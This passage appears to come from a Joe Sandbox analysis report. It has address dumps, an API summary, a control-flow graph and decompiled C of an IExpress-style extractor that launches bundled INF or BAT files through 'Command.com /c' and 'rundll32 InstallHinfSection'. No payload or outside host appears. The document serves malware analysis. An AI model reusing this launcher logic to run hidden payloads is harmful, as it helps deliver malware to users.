                                                                                                                                                                                                    0x00393dfb
                                                                                                                                                                                                    0x00393dfd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393e03
                                                                                                                                                                                                    0x00393e0a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393e15
                                                                                                                                                                                                    0x00393e17
                                                                                                                                                                                                    0x00393e19
                                                                                                                                                                                                    0x00393f94
                                                                                                                                                                                                    0x00393fa4
                                                                                                                                                                                                    0x00393f7c
                                                                                                                                                                                                    0x00393f80
                                                                                                                                                                                                    0x00393f8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393f8b
                                                                                                                                                                                                    0x00393e2c
                                                                                                                                                                                                    0x00393e30
                                                                                                                                                                                                    0x00393e34
                                                                                                                                                                                                    0x00393e36
                                                                                                                                                                                                    0x00393f69
                                                                                                                                                                                                    0x00393f6e
                                                                                                                                                                                                    0x00393f70
                                                                                                                                                                                                    0x00393f76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393f76
                                                                                                                                                                                                    0x00393e3c
                                                                                                                                                                                                    0x00393e43
                                                                                                                                                                                                    0x00393e47
                                                                                                                                                                                                    0x00393e52
                                                                                                                                                                                                    0x00393e56
                                                                                                                                                                                                    0x00393e5c
                                                                                                                                                                                                    0x00393e61
                                                                                                                                                                                                    0x00393e68
                                                                                                                                                                                                    0x00393e70
                                                                                                                                                                                                    0x00393e74
                                                                                                                                                                                                    0x00393e7c
                                                                                                                                                                                                    0x00393e80
                                                                                                                                                                                                    0x00393e82
                                                                                                                                                                                                    0x00393e82
                                                                                                                                                                                                    0x00393e87
                                                                                                                                                                                                    0x00393e87
                                                                                                                                                                                                    0x00393e8b
                                                                                                                                                                                                    0x00393e91
                                                                                                                                                                                                    0x00393e94
                                                                                                                                                                                                    0x00393e96
                                                                                                                                                                                                    0x00393e96
                                                                                                                                                                                                    0x00393e9b
                                                                                                                                                                                                    0x00393e9b
                                                                                                                                                                                                    0x00393e9f
                                                                                                                                                                                                    0x00393ea2
                                                                                                                                                                                                    0x00393ea4
                                                                                                                                                                                                    0x00393ea4
                                                                                                                                                                                                    0x00393ea9
                                                                                                                                                                                                    0x00393ea9
                                                                                                                                                                                                    0x00393ead
                                                                                                                                                                                                    0x00393eb3
                                                                                                                                                                                                    0x00393eb6
                                                                                                                                                                                                    0x00393eb8
                                                                                                                                                                                                    0x00393eb8
                                                                                                                                                                                                    0x00393ebd
                                                                                                                                                                                                    0x00393ebd
                                                                                                                                                                                                    0x00393ec1
                                                                                                                                                                                                    0x00393ec3
                                                                                                                                                                                                    0x00393ec5
                                                                                                                                                                                                    0x00393ec5
                                                                                                                                                                                                    0x00393eca
                                                                                                                                                                                                    0x00393eca
                                                                                                                                                                                                    0x00393ece
                                                                                                                                                                                                    0x00393ed5
                                                                                                                                                                                                    0x00393ed9
                                                                                                                                                                                                    0x00393ee0
                                                                                                                                                                                                    0x00393ee6
                                                                                                                                                                                                    0x00393eea
                                                                                                                                                                                                    0x00393eec
                                                                                                                                                                                                    0x00393eee
                                                                                                                                                                                                    0x00393ef3
                                                                                                                                                                                                    0x00393ef3
                                                                                                                                                                                                    0x00393ef5
                                                                                                                                                                                                    0x00393efa
                                                                                                                                                                                                    0x00393efb
                                                                                                                                                                                                    0x00393efd
                                                                                                                                                                                                    0x00393f40
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393eff
                                                                                                                                                                                                    0x00393eff
                                                                                                                                                                                                    0x00393f05
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393f05
                                                                                                                                                                                                    0x00393efd
                                                                                                                                                                                                    0x00393dc7
                                                                                                                                                                                                    0x00393dce
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393dd0
                                                                                                                                                                                                    0x00393dd7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393dd9
                                                                                                                                                                                                    0x00393ddb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393ddd
                                                                                                                                                                                                    0x00393de1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393de1
                                                                                                                                                                                                    0x00393d59
                                                                                                                                                                                                    0x00393d65
                                                                                                                                                                                                    0x00393d6a
                                                                                                                                                                                                    0x00393d6c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393d6e
                                                                                                                                                                                                    0x00393d75
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393d8f
                                                                                                                                                                                                    0x00393d96
                                                                                                                                                                                                    0x00393d98
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393d98
                                                                                                                                                                                                    0x00393c8f
                                                                                                                                                                                                    0x00393c98
                                                                                                                                                                                                    0x00393cf1
                                                                                                                                                                                                    0x00393cf3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393cfe
                                                                                                                                                                                                    0x00393d11
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393d11
                                                                                                                                                                                                    0x00393c9c
                                                                                                                                                                                                    0x00393ca5
                                                                                                                                                                                                    0x00393ca7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393cad
                                                                                                                                                                                                    0x00393cb2
                                                                                                                                                                                                    0x00393cb7
                                                                                                                                                                                                    0x00393cc5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393ce8
                                                                                                                                                                                                    0x00393cec
                                                                                                                                                                                                    0x00393ced
                                                                                                                                                                                                    0x00393ced
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393ce8
                                                                                                                                                                                                    0x00393c9e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393c9e
                                                                                                                                                                                                    0x00393c56
                                                                                                                                                                                                    0x00393d35
                                                                                                                                                                                                    0x00393d35
                                                                                                                                                                                                    0x00393d3c
                                                                                                                                                                                                    0x00393d48
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393d48
                                                                                                                                                                                                    0x00393c03
                                                                                                                                                                                                    0x00393be2
                                                                                                                                                                                                    0x00393be7
                                                                                                                                                                                                    0x00393bee
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00393C11
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00393CDC
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                      • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                      • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                      • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                      • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                      • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00398C42), ref: 00393D8F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00393E26
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00398C42), ref: 00393EFF
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00398C42), ref: 00393F1F
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00398C42), ref: 00393F40
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00398C42), ref: 00393F47
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00398C42), ref: 00393F76
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00398C42), ref: 00393F80
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00398C42), ref: 00393FC2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                    • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$nst0dum
                                                                                                                                                                                                    • API String ID: 1032054927-335935182
                                                                                                                                                                                                    • Opcode ID: 61630cebbcd5f4a7250dd96d39cd71966205b00554864781fd397714804bffe6
                                                                                                                                                                                                    • Instruction ID: 2698218955381ff7013a8b77c4d6b1235f11bda55810f408ee4c5e45a856ac3e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61630cebbcd5f4a7250dd96d39cd71966205b00554864781fd397714804bffe6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3B1E4B09083019BDF23DF248849B6B77E8EB85750F11092EFA96D62D0DB71CD45CB96
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 141 391ae8-391b2c call 391680 144 391b3b-391b40 141->144 145 391b2e-391b39 141->145 146 391b46-391b61 call 391a84 144->146 145->146 149 391b9f-391bc2 call 391781 call 39658a 146->149 150 391b63-391b65 146->150 157 391bc7-391bd3 call 3966c8 149->157 152 391b68-391b6d 150->152 152->152 154 391b6f-391b74 152->154 154->149 156 391b76-391b7b 154->156 158 391b7d-391b81 156->158 159 391b83-391b86 156->159 166 391bd9-391bf1 CompareStringA 157->166 167 391d73-391d7f call 3966c8 157->167 158->159 161 391b8c-391b9d call 391680 158->161 159->149 162 391b88-391b8a 159->162 161->157 162->149 162->161 166->167 168 391bf7-391c07 GetFileAttributesA 166->168 175 391df8-391e09 LocalAlloc 167->175 176 391d81-391d99 CompareStringA 167->176 170 391c0d-391c15 168->170 171 391d53-391d5e 168->171 170->171 174 391c1b-391c33 call 391a84 170->174 173 391d64-391d6e call 3944b9 171->173 188 391e94-391ea4 call 396ce0 173->188 190 391c50-391c61 LocalAlloc 174->190 191 391c35-391c38 174->191 178 391e0b-391e1b GetFileAttributesA 175->178 179 391dd4-391ddf 175->179 176->175 181 391d9b-391da2 176->181 183 391e1d-391e1f 178->183 184 391e67-391e73 call 391680 178->184 179->173 186 391da5-391daa 181->186 183->184 189 391e21-391e3e call 391781 183->189 195 391e78-391e84 call 392aac 184->195 186->186 192 391dac-391db4 186->192 189->195 211 391e40-391e43 189->211 190->179 194 391c67-391c72 190->194 198 391c3a 191->198 199 391c40-391c4b call 391a84 191->199 193 391db7-391dbc 192->193 193->193 200 391dbe-391dd2 LocalAlloc 193->200 202 391c79-391cc0 GetPrivateProfileIntA GetPrivateProfileStringA 194->202 203 391c74 194->203 210 391e89-391e92 195->210 198->199 199->190 200->179 207 391de1-391df3 call 39171e 200->207 208 391cf8-391d07 202->208 209 391cc2-391ccc 202->209 203->202 207->210 216 391d09-391d21 GetShortPathNameA 208->216 217 391d23 208->217 213 391cce 209->213 214 391cd3-391cf3 call 391680 * 2 209->214 210->188 211->195 215 391e45-391e65 call 3916b3 * 2 211->215 213->214 214->210 215->195 218 391d28-391d2b 216->218 217->218 222 391d2d 218->222 223 391d32-391d4e call 39171e 218->223 222->223 223->210
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00391AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v527;
                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                    				char _v1552;
                                                                                                                                                                                                    				CHAR* _v1556;
                                                                                                                                                                                                    				int* _v1560;
                                                                                                                                                                                                    				CHAR** _v1564;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                    				CHAR* _t53;
                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                    				char* _t57;
                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                    				CHAR* _t60;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				signed char _t65;
                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                    				unsigned int _t85;
                                                                                                                                                                                                    				CHAR* _t90;
                                                                                                                                                                                                    				CHAR* _t92;
                                                                                                                                                                                                    				char _t105;
                                                                                                                                                                                                    				char _t106;
                                                                                                                                                                                                    				CHAR** _t111;
                                                                                                                                                                                                    				CHAR* _t115;
                                                                                                                                                                                                    				intOrPtr* _t125;
                                                                                                                                                                                                    				void* _t126;
                                                                                                                                                                                                    				CHAR* _t132;
                                                                                                                                                                                                    				CHAR* _t135;
                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                    				void* _t145;
                                                                                                                                                                                                    				intOrPtr* _t146;
                                                                                                                                                                                                    				char* _t148;
                                                                                                                                                                                                    				CHAR* _t151;
                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                    				CHAR* _t155;
                                                                                                                                                                                                    				CHAR* _t156;
                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                    				signed int _t158;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t48 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                    				_t108 = __ecx;
                                                                                                                                                                                                    				_v1564 = _a4;
                                                                                                                                                                                                    				_v1560 = _a8;
                                                                                                                                                                                                    				E00391680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                    				if(_v528 != 0x22) {
                                                                                                                                                                                                    					_t135 = " ";
                                                                                                                                                                                                    					_t53 =  &_v528;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t135 = "\"";
                                                                                                                                                                                                    					_t53 =  &_v527;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t111 =  &_v1556;
                                                                                                                                                                                                    				_v1556 = _t53;
                                                                                                                                                                                                    				_t54 = E00391A84(_t111, _t135);
                                                                                                                                                                                                    				_t156 = _v1556;
                                                                                                                                                                                                    				_t151 = _t54;
                                                                                                                                                                                                    				if(_t156 == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_push(_t111);
                                                                                                                                                                                                    					E00391781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                    					E0039658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t132 = _t156;
                                                                                                                                                                                                    					_t148 =  &(_t132[1]);
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t105 =  *_t132;
                                                                                                                                                                                                    						_t132 =  &(_t132[1]);
                                                                                                                                                                                                    					} while (_t105 != 0);
                                                                                                                                                                                                    					_t111 = _t132 - _t148;
                                                                                                                                                                                                    					if(_t111 < 3) {
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t106 = _t156[1];
                                                                                                                                                                                                    					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                    						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						E00391680( &_v268, 0x104, _t156);
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						_t138 = 0x2e;
                                                                                                                                                                                                    						_t57 = E003966C8(_t156, _t138);
                                                                                                                                                                                                    						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                    							_t139 = 0x2e;
                                                                                                                                                                                                    							_t115 = _t156;
                                                                                                                                                                                                    							_t58 = E003966C8(_t115, _t139);
                                                                                                                                                                                                    							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                    									goto L43;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                    								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                    									E00391680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_push(_t115);
                                                                                                                                                                                                    									_t108 = 0x400;
                                                                                                                                                                                                    									E00391781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                    									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                    										E003916B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                    										E003916B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t140 = _t156;
                                                                                                                                                                                                    								 *_t156 = 0;
                                                                                                                                                                                                    								E00392AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                    								goto L53;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t108 = "Command.com /c %s";
                                                                                                                                                                                                    								_t125 = "Command.com /c %s";
                                                                                                                                                                                                    								_t145 = _t125 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t76 =  *_t125;
                                                                                                                                                                                                    									_t125 = _t125 + 1;
                                                                                                                                                                                                    								} while (_t76 != 0);
                                                                                                                                                                                                    								_t126 = _t125 - _t145;
                                                                                                                                                                                                    								_t146 =  &_v268;
                                                                                                                                                                                                    								_t157 = _t146 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t77 =  *_t146;
                                                                                                                                                                                                    									_t146 = _t146 + 1;
                                                                                                                                                                                                    								} while (_t77 != 0);
                                                                                                                                                                                                    								_t140 = _t146 - _t157;
                                                                                                                                                                                                    								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                    								if(_t156 != 0) {
                                                                                                                                                                                                    									E0039171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                    									goto L53;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L43;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                    								_t140 = 0x525;
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t60 =  &_v268;
                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t140 = "[";
                                                                                                                                                                                                    								_v1556 = _t151;
                                                                                                                                                                                                    								_t90 = E00391A84( &_v1556, "[");
                                                                                                                                                                                                    								if(_t90 != 0) {
                                                                                                                                                                                                    									if( *_t90 != 0) {
                                                                                                                                                                                                    										_v1556 = _t90;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t140 = "]";
                                                                                                                                                                                                    									E00391A84( &_v1556, "]");
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                    									L43:
                                                                                                                                                                                                    									_t60 = 0;
                                                                                                                                                                                                    									_t140 = 0x4b5;
                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                    									_push(0x10);
                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                    									L35:
                                                                                                                                                                                                    									_push(_t60);
                                                                                                                                                                                                    									E003944B9(0, _t140);
                                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                                    									goto L54;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t155 = _v1556;
                                                                                                                                                                                                    									_t92 = _t155;
                                                                                                                                                                                                    									if( *_t155 == 0) {
                                                                                                                                                                                                    										_t92 = "DefaultInstall";
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									 *0x399120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                    									 *_v1560 = 1;
                                                                                                                                                                                                    									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x391140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                    										 *0x399a34 =  *0x399a34 & 0xfffffffb;
                                                                                                                                                                                                    										if( *0x399a40 != 0) {
                                                                                                                                                                                                    											_t108 = "setupapi.dll";
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t108 = "setupx.dll";
                                                                                                                                                                                                    											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										if( *_t155 == 0) {
                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_push( &_v268);
                                                                                                                                                                                                    										_push(_t155);
                                                                                                                                                                                                    										E0039171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										 *0x399a34 =  *0x399a34 | 0x00000004;
                                                                                                                                                                                                    										if( *_t155 == 0) {
                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										E00391680(_t108, 0x104, _t155);
                                                                                                                                                                                                    										_t140 = 0x200;
                                                                                                                                                                                                    										E00391680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L53:
                                                                                                                                                                                                    									_t62 = 1;
                                                                                                                                                                                                    									 *_v1564 = _t156;
                                                                                                                                                                                                    									L54:
                                                                                                                                                                                                    									_pop(_t152);
                                                                                                                                                                                                    									return E00396CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}














































                                                                                                                                                                                                    0x00391af3
                                                                                                                                                                                                    0x00391afa
                                                                                                                                                                                                    0x00391b07
                                                                                                                                                                                                    0x00391b09
                                                                                                                                                                                                    0x00391b1a
                                                                                                                                                                                                    0x00391b20
                                                                                                                                                                                                    0x00391b2c
                                                                                                                                                                                                    0x00391b3b
                                                                                                                                                                                                    0x00391b40
                                                                                                                                                                                                    0x00391b2e
                                                                                                                                                                                                    0x00391b2e
                                                                                                                                                                                                    0x00391b33
                                                                                                                                                                                                    0x00391b33
                                                                                                                                                                                                    0x00391b46
                                                                                                                                                                                                    0x00391b4c
                                                                                                                                                                                                    0x00391b52
                                                                                                                                                                                                    0x00391b57
                                                                                                                                                                                                    0x00391b5d
                                                                                                                                                                                                    0x00391b61
                                                                                                                                                                                                    0x00391b9f
                                                                                                                                                                                                    0x00391b9f
                                                                                                                                                                                                    0x00391bb1
                                                                                                                                                                                                    0x00391bc2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391b63
                                                                                                                                                                                                    0x00391b63
                                                                                                                                                                                                    0x00391b65
                                                                                                                                                                                                    0x00391b68
                                                                                                                                                                                                    0x00391b68
                                                                                                                                                                                                    0x00391b6a
                                                                                                                                                                                                    0x00391b6b
                                                                                                                                                                                                    0x00391b6f
                                                                                                                                                                                                    0x00391b74
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391b76
                                                                                                                                                                                                    0x00391b7b
                                                                                                                                                                                                    0x00391b86
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391b8c
                                                                                                                                                                                                    0x00391b8c
                                                                                                                                                                                                    0x00391b98
                                                                                                                                                                                                    0x00391bc7
                                                                                                                                                                                                    0x00391bc9
                                                                                                                                                                                                    0x00391bcc
                                                                                                                                                                                                    0x00391bd3
                                                                                                                                                                                                    0x00391d75
                                                                                                                                                                                                    0x00391d76
                                                                                                                                                                                                    0x00391d78
                                                                                                                                                                                                    0x00391d7f
                                                                                                                                                                                                    0x00391e05
                                                                                                                                                                                                    0x00391e09
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391e12
                                                                                                                                                                                                    0x00391e1b
                                                                                                                                                                                                    0x00391e73
                                                                                                                                                                                                    0x00391e21
                                                                                                                                                                                                    0x00391e21
                                                                                                                                                                                                    0x00391e28
                                                                                                                                                                                                    0x00391e37
                                                                                                                                                                                                    0x00391e3e
                                                                                                                                                                                                    0x00391e52
                                                                                                                                                                                                    0x00391e60
                                                                                                                                                                                                    0x00391e60
                                                                                                                                                                                                    0x00391e3e
                                                                                                                                                                                                    0x00391e79
                                                                                                                                                                                                    0x00391e7b
                                                                                                                                                                                                    0x00391e84
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391d9b
                                                                                                                                                                                                    0x00391d9b
                                                                                                                                                                                                    0x00391da0
                                                                                                                                                                                                    0x00391da2
                                                                                                                                                                                                    0x00391da5
                                                                                                                                                                                                    0x00391da5
                                                                                                                                                                                                    0x00391da7
                                                                                                                                                                                                    0x00391da8
                                                                                                                                                                                                    0x00391dac
                                                                                                                                                                                                    0x00391dae
                                                                                                                                                                                                    0x00391db4
                                                                                                                                                                                                    0x00391db7
                                                                                                                                                                                                    0x00391db7
                                                                                                                                                                                                    0x00391db9
                                                                                                                                                                                                    0x00391dba
                                                                                                                                                                                                    0x00391dbe
                                                                                                                                                                                                    0x00391dc3
                                                                                                                                                                                                    0x00391dce
                                                                                                                                                                                                    0x00391dd2
                                                                                                                                                                                                    0x00391deb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391df0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391dd2
                                                                                                                                                                                                    0x00391bf7
                                                                                                                                                                                                    0x00391bfe
                                                                                                                                                                                                    0x00391c07
                                                                                                                                                                                                    0x00391d55
                                                                                                                                                                                                    0x00391d5a
                                                                                                                                                                                                    0x00391d5b
                                                                                                                                                                                                    0x00391d5d
                                                                                                                                                                                                    0x00391d5e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391c1b
                                                                                                                                                                                                    0x00391c1b
                                                                                                                                                                                                    0x00391c20
                                                                                                                                                                                                    0x00391c2c
                                                                                                                                                                                                    0x00391c33
                                                                                                                                                                                                    0x00391c38
                                                                                                                                                                                                    0x00391c3a
                                                                                                                                                                                                    0x00391c3a
                                                                                                                                                                                                    0x00391c40
                                                                                                                                                                                                    0x00391c4b
                                                                                                                                                                                                    0x00391c4b
                                                                                                                                                                                                    0x00391c5d
                                                                                                                                                                                                    0x00391c61
                                                                                                                                                                                                    0x00391dd4
